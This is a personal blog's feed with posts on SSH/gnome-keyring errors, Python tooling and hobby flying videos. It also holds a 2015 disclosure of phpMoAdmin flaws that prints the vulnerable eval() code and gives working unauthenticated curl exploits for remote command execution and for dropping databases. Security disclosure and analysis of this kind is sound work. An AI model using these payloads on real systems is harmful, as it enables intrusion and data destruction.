Sr4l.dehttps://sr4l.de/2020-10-13T11:20:05+02:00OpenSSH keyfile format doesn't play with gnome-keyring daemon2017-09-30T15:55:00+02:002020-10-13T11:20:05+02:00Larstag:sr4l.de,2017-09-30:/openssh-keyfile-format-doesnt-play-with-gnome-keyring-daemon.html<p>If you use the OpenSSH keyfile format (ssh-keygen -o or using Ed25519
keys) and using gnome-keyring you may get:</p>
<div class="highlight"><pre><span></span><code><span class="n">sr4l</span><span class="nv">@Lars</span><span class="o">-</span><span class="nl">Laptop</span><span class="p">:</span><span class="o">~</span><span class="err">$</span><span class="w"> </span><span class="n">ssh</span><span class="w"> </span><span class="k">user</span><span class="nv">@server</span><span class="w"></span>
<span class="nl">sign_and_send_pubkey</span><span class="p">:</span><span class="w"> </span><span class="n">signing</span><span class="w"> </span><span class="nl">failed</span><span class="p">:</span><span class="w"> </span><span class="n">agent</span><span class="w"> </span><span class="n">refused</span><span class="w"> </span><span class="k">operation</span><span class="w"></span>
<span class="n">Permission</span><span class="w"> </span><span class="n">denied</span><span class="w"> </span><span class="p">(</span><span class="n">publickey</span><span class="p">).</span><span class="w"></span>
</code></pre></div>
<p>This error message cost me a lot of time because on some PCs it does
work on others it doesn't. Later I discovered that the problem only
occurred if the keys have the default name ~/ssh/id_rsa. Later I found
similar reports leading to gnome-keyring daemon.</p>
<p><strong>Solutions:</strong></p>
<ul>
<li>Deactivate gnome-keyring entirely</li>
<li>Only deactivate the gnome-keyring SSH backend</li>
<li>Safe your keyfiles with a non-default …</li></ul><p>If you use the OpenSSH keyfile format (ssh-keygen -o or using Ed25519
keys) and using gnome-keyring you may get:</p>
<div class="highlight"><pre><span></span><code><span class="n">sr4l</span><span class="nv">@Lars</span><span class="o">-</span><span class="nl">Laptop</span><span class="p">:</span><span class="o">~</span><span class="err">$</span><span class="w"> </span><span class="n">ssh</span><span class="w"> </span><span class="k">user</span><span class="nv">@server</span><span class="w"></span>
<span class="nl">sign_and_send_pubkey</span><span class="p">:</span><span class="w"> </span><span class="n">signing</span><span class="w"> </span><span class="nl">failed</span><span class="p">:</span><span class="w"> </span><span class="n">agent</span><span class="w"> </span><span class="n">refused</span><span class="w"> </span><span class="k">operation</span><span class="w"></span>
<span class="n">Permission</span><span class="w"> </span><span class="n">denied</span><span class="w"> </span><span class="p">(</span><span class="n">publickey</span><span class="p">).</span><span class="w"></span>
</code></pre></div>
<p>This error message cost me a lot of time because on some PCs it does
work on others it doesn't. Later I discovered that the problem only
occurred if the keys have the default name ~/ssh/id_rsa. Later I found
similar reports leading to gnome-keyring daemon.</p>
<p><strong>Solutions:</strong></p>
<ul>
<li>Deactivate gnome-keyring entirely</li>
<li>Only deactivate the gnome-keyring SSH backend</li>
<li>Safe your keyfiles with a non-default name and use ssh-add /path/to/file or ~/.ssh/config to use them</li>
</ul>
<p>A good resource for detailed solutions can be found in the <a href="https://wiki.archlinux.org/index.php/GNOME/Keyring">Arch Linux
Wiki</a>.</p>
<p><strong>Notes for XFCE:</strong></p>
<p>In XFCE gnome-keyring starts automatically if you have "Launch GNOME
services on startup" under "Settings > Session and Startup > Advanced"
checked. I unchecked it and enabled gnome-keyring by enabling gnome-keyring
pkcs11 and secrets backend in "Settings > Session and Startup >
Application Autostart"</p>Ported pytesseract to Python32016-01-27T09:43:00+01:002020-10-13T11:20:05+02:00Lars Kistnertag:sr4l.de,2016-01-27:/ported-pytesseract-to-python3.html<p>Over a year ago I started a new project and needed <a href="https://en.wikipedia.org/wiki/Optical_character_recognition">OCR</a>. I choose
<a href="https://pypi.python.org/pypi/pytesseract">pytesseract</a> but there was no Python 3 support and I made the decision
to port it. And so this was <a href="https://github.com/madmaze/pytesseract/pull/9">my first pull request</a> to an open source
project. It wasn't much work but now pytesserect supports Python 2 and 3
with the same codebase.</p>
<p>PS: Ok my <a href="https://github.com/jsliang/pelican-fresh/pull/12">first pull request</a> was to <strong>pelican-fresh</strong> theme, but this was even less work.</p>Paragliding winch tow2015-08-22T16:07:00+02:002020-10-13T11:20:05+02:00Lars Kistnertag:sr4l.de,2015-08-22:/paragliding-winch-tow.html<p>Last week I made a video in Edermünde (Grifte, near Kassel) in Germany
from on of my practice flights with my paraglider. Its recorded with a
Mobis ActionCam (1080p@30fps) strapped around my leg. It's in full length,
but I modified the audio and remove most radio communication. Enjoy!</p>
<iframe src="https://player.vimeo.com/video/137000443" width="500" height="281" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe>
<p><a href="https://vimeo.com/137000443">Paragliding winch tow</a> from <a href="https://vimeo.com/user29759274">Lars Kistner</a> on <a href="https://vimeo.com">Vimeo</a>.</p>Zero-Day-Exploit for phpMoAdmin2015-03-10T18:01:00+01:002020-10-13T11:20:05+02:00Lars Kistnertag:sr4l.de,2015-03-10:/zero-day-exploit-for-phpmoadmin.html<p><strong>Cross post: Also on <a href="https://github.com/MongoDB-Rox/phpMoAdmin-MongoDB-Admin-Tool-for-PHP/issues/26">Github</a>.</strong></p>
<p>A week ago I read a security alert at <a href="http://www.heise.de/security/meldung/Zero-Day-Exploit-fuer-phpMoAdmin-Luecke-2566518.html">'heise Security' </a> . It's a
German IT news site. The article was about someone is selling a
Zero-Day-Exploit for phpMoAdmin. Here is another <a href="http://thehackernews.com/2015/03/phpMoAdmin-mongoDB-exploit.html">source</a>
in English. Because nobody has written an issue or a fix a week later I
decided to write all the stuff down I figured out last week.</p>
<p>At least for the <em>second bug</em> I already found Metasploit scripts. So
I decide to publish the exploits as well. Its already all over the
Internet.</p>
<p>Well, the fact that <strong>there is a security hole</strong> and …</p><p><strong>Cross post: Also on <a href="https://github.com/MongoDB-Rox/phpMoAdmin-MongoDB-Admin-Tool-for-PHP/issues/26">Github</a>.</strong></p>
<p>A week ago I read a security alert at <a href="http://www.heise.de/security/meldung/Zero-Day-Exploit-fuer-phpMoAdmin-Luecke-2566518.html">'heise Security' </a> . It's a
German IT news site. The article was about someone is selling a
Zero-Day-Exploit for phpMoAdmin. Here is another <a href="http://thehackernews.com/2015/03/phpMoAdmin-mongoDB-exploit.html">source</a>
in English. Because nobody has written an issue or a fix a week later I
decided to write all the stuff down I figured out last week.</p>
<p>At least for the <em>second bug</em> I already found Metasploit scripts. So
I decide to publish the exploits as well. Its already all over the
Internet.</p>
<p>Well, the fact that <strong>there is a security hole</strong> and not <strong>what
the hole is</strong> I got interested. I'm not using MongoDB and I am not so
much into PHP, but a close look at the source and I found two suspects
that might be a problem.</p>
<div class="highlight"><pre><span></span><code><span class="mi">556</span><span class="o">:</span> <span class="nf">eval</span><span class="o">(</span><span class="s1">'$find = '</span> <span class="o">.</span> <span class="n">$_GET</span><span class="o">[</span><span class="s1">'find'</span><span class="o">]</span> <span class="o">.</span> <span class="s1">';'</span><span class="o">);</span>
<span class="mi">694</span><span class="o">:</span> <span class="nf">eval</span><span class="o">(</span><span class="s1">'$obj='</span> <span class="o">.</span> <span class="n">$obj</span> <span class="o">.</span> <span class="s1">';'</span><span class="o">);</span>
</code></pre></div>
<p>The first is obviously risky, an <code>eval</code> over a GET parameter. The second
could be, depends on $obj.</p>
<h2>The first</h2>
<div class="highlight"><pre><span></span><code><span class="mi">272</span><span class="o">:</span> <span class="kd">class</span> <span class="n">moadminModel</span> <span class="o">{</span>
<span class="mi">000</span><span class="o">:</span> <span class="o">...</span>
<span class="mi">546</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">function </span><span class="nf">listRows</span><span class="o">(</span><span class="err">$collection</span><span class="o">)</span> <span class="o">{</span>
<span class="mi">547</span><span class="o">:</span> <span class="n">foreach</span> <span class="o">(</span><span class="n">$this</span><span class="o">-></span><span class="n">sort</span> <span class="k">as</span> <span class="n">$key</span> <span class="o">=></span> <span class="n">$val</span><span class="o">)</span> <span class="o">{</span> <span class="c1">//cast vals to int</span>
<span class="mi">548</span><span class="o">:</span> <span class="n">$sort</span><span class="o">[</span><span class="n">$key</span><span class="o">]</span> <span class="o">=</span> <span class="o">(</span><span class="n">int</span><span class="o">)</span> <span class="n">$val</span><span class="o">;</span>
<span class="mi">549</span><span class="o">:</span> <span class="o">}</span>
<span class="mi">550</span><span class="o">:</span> <span class="n">$col</span> <span class="o">=</span> <span class="n">$this</span><span class="o">-></span><span class="n">mongo</span><span class="o">-></span><span class="n">selectCollection</span><span class="o">(</span><span class="n">$collection</span><span class="o">);</span>
<span class="mi">551</span><span class="o">:</span>
<span class="mi">552</span><span class="o">:</span> <span class="n">$find</span> <span class="o">=</span> <span class="n">array</span><span class="o">();</span>
<span class="mi">553</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">isset</span><span class="o">(</span><span class="n">$_GET</span><span class="o">[</span><span class="s1">'find'</span><span class="o">])</span> <span class="o">&&</span> <span class="n">$_GET</span><span class="o">[</span><span class="s1">'find'</span><span class="o">])</span> <span class="o">{</span>
<span class="mi">554</span><span class="o">:</span> <span class="n">$_GET</span><span class="o">[</span><span class="s1">'find'</span><span class="o">]</span> <span class="o">=</span> <span class="n">trim</span><span class="o">(</span><span class="n">$_GET</span><span class="o">[</span><span class="s1">'find'</span><span class="o">]);</span>
<span class="mi">555</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">strpos</span><span class="o">(</span><span class="n">$_GET</span><span class="o">[</span><span class="s1">'find'</span><span class="o">],</span> <span class="s1">'array'</span><span class="o">)</span> <span class="o">===</span> <span class="mi">0</span><span class="o">)</span> <span class="o">{</span>
<span class="mi">556</span><span class="o">:</span> <span class="nf">eval</span><span class="o">(</span><span class="s1">'$find = '</span> <span class="o">.</span> <span class="n">$_GET</span><span class="o">[</span><span class="s1">'find'</span><span class="o">]</span> <span class="o">.</span> <span class="s1">';'</span><span class="o">);</span>
<span class="mi">000</span><span class="o">:</span> <span class="o">...</span>
</code></pre></div>
<p>For the first we need to call the <code>listRows</code> function and can than inject
code in the <code>$_GET['find']</code> key, but find must start with <code>array</code>.</p>
<p>There seems only one way to call <code>listRows</code>, and this is by setting the
GET key <code>action</code>, supply a fake <code>collection</code> and our manipulated find
key.</p>
<div class="highlight"><pre><span></span><code><span class="mi">739</span><span class="o">:</span> <span class="kd">class</span> <span class="n">moadminComponent</span> <span class="o">{</span>
<span class="mi">000</span><span class="o">:</span> <span class="o">...</span>
<span class="mi">763</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">function </span><span class="nf">__construct</span><span class="o">()</span> <span class="o">{</span>
<span class="mi">000</span><span class="o">:</span> <span class="o">...</span>
<span class="mi">837</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">isset</span><span class="o">(</span><span class="n">$_GET</span><span class="o">[</span><span class="s1">'collection'</span><span class="o">])</span> <span class="o">&&</span> <span class="n">$action</span> <span class="o">!=</span> <span class="s1">'listCollections'</span> <span class="o">&&</span> <span class="n">method_exists</span><span class="o">(</span><span class="n">self</span><span class="o">::</span><span class="n">$model</span><span class="o">,</span> <span class="n">$action</span><span class="o">))</span> <span class="o">{</span>
<span class="mi">838</span><span class="o">:</span> <span class="n">$this</span><span class="o">-></span><span class="n">mongo</span><span class="o">[</span><span class="n">$action</span><span class="o">]</span> <span class="o">=</span> <span class="n">self</span><span class="o">::</span><span class="n">$model</span><span class="o">-></span><span class="n">$action</span><span class="o">(</span><span class="n">$_GET</span><span class="o">[</span><span class="s1">'collection'</span><span class="o">]);</span>
<span class="mi">000</span><span class="o">:</span>
<span class="mi">1978</span><span class="o">:</span> <span class="n">$mo</span> <span class="o">=</span> <span class="k">new</span> <span class="n">moadminComponent</span><span class="o">;</span>
</code></pre></div>
<p><code>moadminComponent</code> is created at the beginning without login or session
check, so this makes it all too easy. We can run every shell command by
providing the right GET keys.</p>
<p><strong>Exploit:</strong></p>
<p><code>curl "http://localhost/phpmoadmin/moadmin.php?action=listRows&collection=0&find=array();system(%27whoami%27);exit;"</code></p>
<h2>And the second?</h2>
<div class="highlight"><pre><span></span><code><span class="mi">693</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">function </span><span class="nf">saveObject</span><span class="o">(</span><span class="err">$collection,</span> <span class="err">$obj</span><span class="o">)</span> <span class="o">{</span>
<span class="mi">691</span><span class="o">:</span> <span class="nf">eval</span><span class="o">(</span><span class="s1">'$obj='</span> <span class="o">.</span> <span class="n">$obj</span> <span class="o">.</span> <span class="s1">';'</span><span class="o">);</span> <span class="c1">//cast from string to array</span>
<span class="mi">692</span><span class="o">:</span> <span class="k">return</span> <span class="n">$this</span><span class="o">-></span><span class="n">mongo</span><span class="o">-></span><span class="n">selectCollection</span><span class="o">(</span><span class="n">$collection</span><span class="o">)-></span><span class="n">save</span><span class="o">(</span><span class="n">$obj</span><span class="o">);</span>
<span class="mi">693</span><span class="o">:</span> <span class="o">}</span>
</code></pre></div>
<p>To exploit the second suspect we need run <code>saveObject</code>. It seems to be
called only once, again in the constructor of <code>moadminComponent</code>, and
the function parameter <code>$obj</code> is a POST key, it could not be easier:</p>
<div class="highlight"><pre><span></span><code><span class="mi">739</span><span class="o">:</span> <span class="kd">class</span> <span class="n">moadminComponent</span> <span class="o">{</span>
<span class="mi">000</span><span class="o">:</span> <span class="o">...</span>
<span class="mi">763</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">function </span><span class="nf">__construct</span><span class="o">()</span> <span class="o">{</span>
<span class="mi">000</span><span class="o">:</span> <span class="o">...</span>
<span class="mi">788</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">self</span><span class="o">::</span><span class="n">$model</span><span class="o">-></span><span class="n">saveObject</span><span class="o">(</span><span class="n">$_GET</span><span class="o">[</span><span class="s1">'collection'</span><span class="o">],</span> <span class="n">$_POST</span><span class="o">[</span><span class="s1">'object'</span><span class="o">]))</span> <span class="o">{</span>
</code></pre></div>
<p>So with placing a code injection in POST key <code>object</code> you can run any
shell command with PHP process rights. Again no login needed.</p>
<p><strong>Exploit:</strong></p>
<p><code>curl "http://localhost/phpmoadmin/moadmin.php" -d "object=0;system('whoami');exit"</code></p>
<h2>Any other problems?</h2>
<p>Many. Because the check for a valid session is too late you can play with
many direct links. Like dropping databases you know or guess there name:</p>
<p><code>curl "http://localhost/phpmoadmin/moadmin.php?db=ANY_DB_NAME&action=dropDb"</code></p>
<p>Why bother writing a login system that only prevents you from looking
at your page?!?</p>
<h2>Solution</h2>
<p>Too fix this issues you need more than a bug fix. First everyone should
delete phpMoAdmin or add an extra layer of access control (i.e. .htaccess)
and also only grant people access you would give a shell login.</p>Broken pyvenv in Ubuntu2014-11-30T21:05:00+01:002020-10-13T11:20:05+02:00Lars Kistnertag:sr4l.de,2014-11-30:/broken-pyvenv-in-ubuntu.html<p>Since version 3.3 Python has his own virtual environment build-in. This
is extremely useful especially if you like to install development or
other specific versions of python libraries without messing with
Ubuntu's repository python libs.</p>
<p>Sadly it is broken in Ubuntu 14.04 and 14.10. If you try:</p>
<div class="highlight"><pre><span></span><code>sr4l@LARS-Laptop:~$ pyvenv-3.4 myvenv
Error: Command <span class="s1">'['</span>/home/sr4l/myvenv/bin/python3.4<span class="s1">', '</span>-Im<span class="s1">', '</span>ensurepip<span class="s1">', '</span>--upgrade<span class="s1">', '</span>--default-pip<span class="s1">']'</span> returned non-zero <span class="nb">exit</span> status <span class="m">1</span>
sr4l@LARS-Laptop:~$
</code></pre></div>
<p>You can only use it without pip and later install pip manually. (<a href="https://bugs.launchpad.net/ubuntu/+source/python3.4/+bug/1290847">Bug report</a>)</p>
<p>With Ubuntu 14.04s Python 3.4 and the newest version of …</p><p>Since version 3.3 Python has his own virtual environment build-in. This
is extremely useful especially if you like to install development or
other specific versions of python libraries without messing with
Ubuntu's repository python libs.</p>
<p>Sadly it is broken in Ubuntu 14.04 and 14.10. If you try:</p>
<div class="highlight"><pre><span></span><code>sr4l@LARS-Laptop:~$ pyvenv-3.4 myvenv
Error: Command <span class="s1">'['</span>/home/sr4l/myvenv/bin/python3.4<span class="s1">', '</span>-Im<span class="s1">', '</span>ensurepip<span class="s1">', '</span>--upgrade<span class="s1">', '</span>--default-pip<span class="s1">']'</span> returned non-zero <span class="nb">exit</span> status <span class="m">1</span>
sr4l@LARS-Laptop:~$
</code></pre></div>
<p>You can only use it without pip and later install pip manually. (<a href="https://bugs.launchpad.net/ubuntu/+source/python3.4/+bug/1290847">Bug report</a>)</p>
<p>With Ubuntu 14.04s Python 3.4 and the newest version of setuptools and
pip:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># create python venv in folder myvenv without pip</span>
pyvenv-3.4 --without-pip myvenv
<span class="c1"># enter the venv</span>
<span class="nb">source</span> ./myvenv/bin/activate
<span class="c1"># download, extract and install (in venv) setuptools</span>
wget https://pypi.python.org/packages/source/s/setuptools/setuptools-7.0.tar.gz
tar -vzxf setuptools-7.0.tar.gz
<span class="nb">cd</span> setuptools-7.0
python setup.py install
<span class="nb">cd</span> ..
<span class="c1"># download, extract and install (in venv) pip</span>
wget https://pypi.python.org/packages/source/p/pip/pip-1.5.6.tar.gz
tar -vzxf pip-1.5.6.tar.gz
<span class="nb">cd</span> pip-1.5.6
python setup.py install
<span class="nb">cd</span> ..
<span class="c1"># leave the python venv</span>
deactivate
</code></pre></div>First flights with Joysway Sprite 7502014-11-16T10:53:00+01:002020-10-13T11:20:05+02:00Lars Kistnertag:sr4l.de,2014-11-16:/first-flights-with-joysway-sprite-750.html<p>Here is a short video of my first flights with a RC plane. The model
is a Joysway Sprite 750, with a wingspan of 750mm. It was recorded on 13.
September 2014 in Wehretal (Germany) and edited with Kdenlive.</p>
<iframe src="//player.vimeo.com/video/106279850" width="500" height="281" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe>
<p><a href="http://vimeo.com/106279850">Joysway Sprite 750 RC Glider</a> from <a href="http://vimeo.com/user29759274">Lars Kistner</a> on <a href="https://vimeo.com">Vimeo</a>.</p>